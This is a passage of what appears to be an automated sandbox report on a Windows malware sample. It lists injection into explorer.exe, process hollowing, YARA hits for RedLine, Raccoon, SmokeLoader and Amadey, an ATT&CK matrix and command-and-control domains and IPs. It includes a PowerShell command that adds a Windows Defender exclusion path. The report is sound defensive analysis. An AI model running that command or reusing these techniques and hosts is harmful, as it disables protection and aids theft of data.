                        Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-6000.top
                        Source: C:\Windows\explorer.exeDomain query: hajezey1.top
                        Source: C:\Windows\explorer.exeDomain query: sysaheu90.top
                        Benign windows process drops PE filesShow sources
                        Source: C:\Windows\explorer.exeFile created: jejhieg.6.drJump to dropped file
                        Maps a DLL or memory area into another processShow sources
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Allocates memory in foreign processesShow sources
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 400000 protect: page execute and read and write
                        Injects a PE file into a foreign processesShow sources
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeMemory written: C:\Users\user\AppData\Local\Temp\C5EA.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeMemory written: unknown base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeMemory written: C:\Users\user\AppData\Local\Temp\977B.exe base: 400000 value starts with: 4D5A
                        Contains functionality to inject code into remote processesShow sources
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeCode function: 17_2_02BA0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                        Creates a thread in another existing process (thread injection)Show sources
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeThread created: C:\Windows\explorer.exe EIP: 4F61920
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeThread created: unknown EIP: 6D21920
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeThread created: unknown EIP: 3B719C0
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeThread created: unknown EIP: 6CF1920
                        Adds a directory exclusion to Windows DefenderShow sources
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force
                        Sample uses process hollowing techniqueShow sources
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base address: 400000
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeSection unmapped: unknown base address: 400000
                        Writes to foreign memory regionsShow sources
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 400000
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 402000
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 41C000
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe base: 41E000
                        Queues an APC in another process (thread injection)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\977B.exe
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeProcess created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe'
                        Source: C:\Users\user\AppData\Roaming\jejhiegProcess created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeProcess created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /SpecialRun 4101d8 4380
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess created: C:\Users\user\AppData\Local\Temp\977B.exe 977B.exe
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 25_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4AE730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,
                        Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmpBinary or memory string: Progman
                        Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                        Source: explorer.exe, 00000006.00000000.286961405.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
                        Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                        Source: explorer.exe, 00000006.00000000.301003169.0000000001640000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeQueries volume information: C:\Users\user\AppData\Local\Temp\66A4.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\77DC.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeQueries volume information: C:\Users\user\AppData\Local\Temp\977B.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A557.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00410B13 cpuid
                        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 0_2_004234B0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_0041F061 _free,_free,_free,GetTimeZoneInformation,_free,
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00401F20 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4A4020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,

                        Stealing of Sensitive Information:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 00000028.00000000.477374112.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000000.478964555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000002.518079752.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000000.476131601.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Yara detected SmokeLoaderShow sources
                        Source: Yara matchFile source: 19.0.jejhieg.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.C5EA.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.C5EA.exe.2ba15a0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.jejhieg.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.1.jejhieg.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.1.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.C5EA.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.cnv622JnZv.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.jejhieg.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.1.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.2.8615.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.C5EA.exe.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.8615.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.jejhieg.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.jejhieg.2cc15a0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.2.8615.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000021.00000002.465682057.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.440048320.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.440144777.0000000002FF1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.320318511.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.379053476.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.302632865.0000000004F61000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.379166058.0000000001F61000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.464888081.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000003.423422124.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.320173015.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                        Yara detected Amadey botShow sources
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Yara detected Raccoon StealerShow sources
                        Source: Yara matchFile source: 35.3.152F.exe.48f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.3.152F.exe.48f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.152F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.152F.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.478734177.0000000000941000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.476969852.00000000013F0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR

                        Remote Access Functionality:

                        barindex
                        Yara detected RedLine StealerShow sources
                        Source: Yara matchFile source: 00000028.00000000.477374112.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000000.478964555.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000002.518079752.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000000.476131601.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                        Yara detected SmokeLoaderShow sources
                        Source: Yara matchFile source: 19.0.jejhieg.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.C5EA.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.2.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.2.C5EA.exe.2ba15a0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.jejhieg.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.1.jejhieg.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.1.C5EA.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.C5EA.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.cnv622JnZv.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.2.jejhieg.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.1.cnv622JnZv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.2.8615.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.C5EA.exe.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.8615.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.jejhieg.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.2.jejhieg.2cc15a0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.2.8615.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000021.00000002.465682057.00000000047F1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.440048320.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.440144777.0000000002FF1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.320318511.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.379053476.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.302632865.0000000004F61000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.379166058.0000000001F61000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.464888081.0000000002B70000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000003.423422124.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.320173015.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                        Yara detected Raccoon StealerShow sources
                        Source: Yara matchFile source: 35.3.152F.exe.48f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.3.152F.exe.48f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.152F.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.152F.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000023.00000003.460198021.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.478734177.0000000000941000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.476969852.00000000013F0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.593634201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 152F.exe PID: 1280, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid AccountsNative API1DLL Side-Loading11Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer14Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default AccountsShared Modules1Application Shimming1DLL Side-Loading11Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsExploitation for Client Execution1Windows Service1Application Shimming1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsCommand and Scripting Interpreter1Registry Run Keys / Startup Folder1Access Token Manipulation1Software Packing23NTDSSystem Information Discovery26Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol4SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsService Execution2Network Logon ScriptWindows Service1Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol25Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonProcess Injection1012DLL Side-Loading11Cached Domain CredentialsSecurity Software Discovery441VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1File Deletion1DCSyncVirtualization/Sandbox Evasion131Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading11Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion131/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection1012Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                        Compromise Software Supply ChainUnix ShellLaunchdLaunchdHidden Files and Directories1KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 511932 Sample: cnv622JnZv.exe Startdate: 29/10/2021 Architecture: WINDOWS Score: 100 65 znpst.top 2->65 67 nusurtal4f.net 2->67 91 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->91 93 Multi AV Scanner detection for domain / URL 2->93 95 Antivirus detection for URL or domain 2->95 97 13 other signatures 2->97 11 cnv622JnZv.exe 2->11         started        13 jejhieg 2->13         started        signatures3 process4 signatures5 16 cnv622JnZv.exe 11->16         started        141 Machine Learning detection for dropped file 13->141 19 jejhieg 13->19         started        process6 signatures7 83 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 16->83 85 Maps a DLL or memory area into another process 16->85 87 Checks if the current machine is a virtual machine (disk enumeration) 16->87 89 Creates a thread in another existing process (thread injection) 16->89 21 explorer.exe 14 16->21 injected process8 dnsIp9 69 216.128.137.31, 80 AS-CHOOPAUS United States 21->69 71 sysaheu90.top 185.98.87.159, 49756, 49757, 49758 VM-HOSTINGRU Russian Federation 21->71 73 3 other IPs or domains 21->73 47 